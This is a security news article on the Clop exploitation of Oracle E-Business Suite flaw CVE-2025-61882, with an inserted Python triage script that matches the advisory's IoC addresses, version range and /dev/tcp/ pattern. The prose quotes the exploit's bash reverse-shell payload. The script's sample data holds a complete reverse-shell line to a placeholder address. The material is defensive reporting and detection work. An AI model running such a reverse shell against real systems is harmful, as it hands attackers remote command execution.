Oracle EBS Zero-Day CVE-2025-61882 (CVSS 9.8) Being Actively Exploited by Clop Ransomware
Oracle has warned of a zero-day vulnerability in E-Business Suite, designated CVE-2025-61882, that permits unauthenticated remote arbitrary code execution. The flaw is already being actively exploited by the Clop group in data-theft operations, making it one of the most dangerous threats currently observed.
The vulnerability resides in the BI Publisher Integration component of the Oracle Concurrent Processing module. It received a CVSS score of 9.8/10, reflecting its critical severity. The root cause is a lack of authentication combined with trivial exploitability: an attacker may seize control of a system without knowing any credentials.
Oracle confirmed that affected versions span E-Business Suite 12.2.3 through 12.2.14 and released an emergency security update. However, installation of the patch requires the October 2023 bundle, a prerequisite that demands additional attention from administrators.
The urgency is driven by the public availability of an exploit and evidence of active exploitation. Oracle published warnings and indicators of compromise pointing to activity from IPs 200[.]107[.]207[.]26 and 185[.]181[.]60[.]11. The exploit spawns a reverse shell via the payload /bin/bash -i >& /dev/tcp// 0>&1, enabling attackers to execute commands directly.
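The affected version range above and the published indicators (the two IP addresses and the `/dev/tcp/` reverse-shell redirect) are the pieces a defender can check mechanically. The script below is an added example, not Oracle's or the article's code: it decides whether an E-Business Suite version string falls inside 12.2.3 through 12.2.14, sweeps web-server access-log lines for requests from the two published addresses, and flags process command lines that carry the bash `/dev/tcp/` redirect. The access-log format, the hostnames, the request paths and all sample lines are constructed for illustration (the reverse-shell sample uses a TEST-NET address as a stand-in for the host and port the article omits); only the IPs, the version range and the `/dev/tcp/` pattern come from the advisory.

```python
"""Triage helpers for the CVE-2025-61882 indicators named in the advisory.

Added example, not Oracle's or the article's code. Log format, hostnames,
paths and sample lines are constructed; the two IoC addresses, the version
range and the /dev/tcp/ pattern are the only values taken from the article.
"""
import re

# Indicators published by Oracle (defanged in the article, restored here).
IOC_IPS = {"200.107.207.26", "185.181.60.11"}

# Affected range stated in the advisory: 12.2.3 through 12.2.14 inclusive.
AFFECTED_MIN = (12, 2, 3)
AFFECTED_MAX = (12, 2, 14)

# Combined-log-style access line (assumed format, not Oracle's documented one).
ACCESS_RE = re.compile(
    r'^(?P<ip>\d{1,3}(?:\.\d{1,3}){3}) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3})'
)

# The bash reverse-shell idiom quoted in the article: redirect to /dev/tcp/<host>/<port>.
DEV_TCP_RE = re.compile(r"/dev/tcp/[^/\s]+/\d+")


def is_affected_version(version: str) -> bool:
    """True if a three-part EBS version string lies in the advisory's range."""
    try:
        parts = tuple(int(p) for p in version.strip().split("."))
    except ValueError:
        return False
    if len(parts) != 3:
        return False
    return AFFECTED_MIN <= parts <= AFFECTED_MAX


def parse_access_line(line: str):
    """Return the fields of one access-log line, or None if it does not parse."""
    m = ACCESS_RE.match(line)
    return m.groupdict() if m else None


def sweep_access_log(lines):
    """Return (ip, path, status) for every request from a published IoC address."""
    hits = []
    for line in lines:
        rec = parse_access_line(line)
        if rec and rec["ip"] in IOC_IPS:
            hits.append((rec["ip"], rec["path"], int(rec["status"])))
    return hits


def find_reverse_shell_cmdlines(cmdlines):
    """Return command lines containing the /dev/tcp/ reverse-shell redirect."""
    return [c for c in cmdlines if DEV_TCP_RE.search(c)]


# Constructed sample data: access-log lines for a fictional EBS front end.
SAMPLE_ACCESS_LOG = [
    '10.0.0.7 - - [06/Oct/2025:09:12:01 +0000] "GET /app/login HTTP/1.1" 200',
    '200.107.207.26 - - [06/Oct/2025:09:13:44 +0000] "POST /app/report HTTP/1.1" 200',
    '185.181.60.11 - - [06/Oct/2025:09:14:02 +0000] "GET /app/state HTTP/1.1" 302',
    "not a log line",
]

# Constructed sample data: process command lines as an EDR or auditd export might show them.
SAMPLE_CMDLINES = [
    "java -jar /u01/app/concurrent.jar",                 # benign, constructed
    "/bin/bash -i >& /dev/tcp/203.0.113.5/4444 0>&1",   # article's pattern; host/port constructed (TEST-NET)
    "sh -c 'curl -s http://example.invalid/health'",     # benign, constructed
]

if __name__ == "__main__":
    for v in ("12.2.2", "12.2.3", "12.2.14", "12.2.15"):
        print(v, "affected" if is_affected_version(v) else "not in range")
    for hit in sweep_access_log(SAMPLE_ACCESS_LOG):
        print("IoC address hit:", hit)
    for cmd in find_reverse_shell_cmdlines(SAMPLE_CMDLINES):
        print("reverse-shell redirect:", cmd)
```

The version check deliberately rejects anything that is not exactly three numeric parts, so a malformed inventory entry is reported as "not in range" rather than silently matched; treat such entries as needing manual confirmation, not as clean. The `/dev/tcp/` match is a coarse signal and will also fire on legitimate bash-based port checks, so review each hit against the parent process and the concurrent-processing user it ran under.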
Mandiant corroborated the situation: according to their analysis, Clop used this flaw in a data-theft campaign in August 2025, chaining multiple Oracle EBS vulnerabilities—some addressed in July’s patch—and the newly disclosed CVE-2025-61882.
The Clop surge became widely apparent when dozens of organizations received extortion emails threatening to publish exfiltrated material. Those messages claimed attackers had infiltrated corporate Oracle EBS systems and copied internal documents, databases, and confidential files, demanding ransom in exchange for non-publication.
Clop is notorious for large-scale intrusions that abuse zero-day flaws in widely used products. Past campaigns include the 2020 Accellion FTA incident, 2021’s SolarWinds Serv-U exploit, and the 2023 GoAnywhere MFT and MOVEit Transfer breaches, the latter affecting 2,773 organizations. In 2024, Clop exploited two Cleo MFT vulnerabilities (CVE-2024-50623 and CVE-2024-55956).
Notably, the Oracle EBS exploit was first published not by Clop but by another actor calling itself Scattered Lapsus$ Hunters, which posted a Telegram archive titled “ORACLE_EBS_NDAY_EXPLOIT_POC_SCATTERED_LAPSUS_RETARD_CL0P_HUNTERS.zip”. The archive contained two Python scripts (exp.py and server.py) and a readme.md with exploitation instructions. Oracle later confirmed that the archive matched the exploit referenced in its indicators of compromise.
In the same release, Scattered Lapsus$ Hunters shared an archive named “GIFT_FROM_CL0P.7z” allegedly containing fragments of Oracle source code purportedly obtained from support.oracle.com, raising questions about how the group accessed Clop’s tooling and whether the actors collaborated.
Oracle is urging all E-Business Suite administrators to apply the emergency update immediately and to audit systems for signs of compromise. Given the presence of a public exploit and active attacks, any delay risks complete loss of control over affected infrastructure.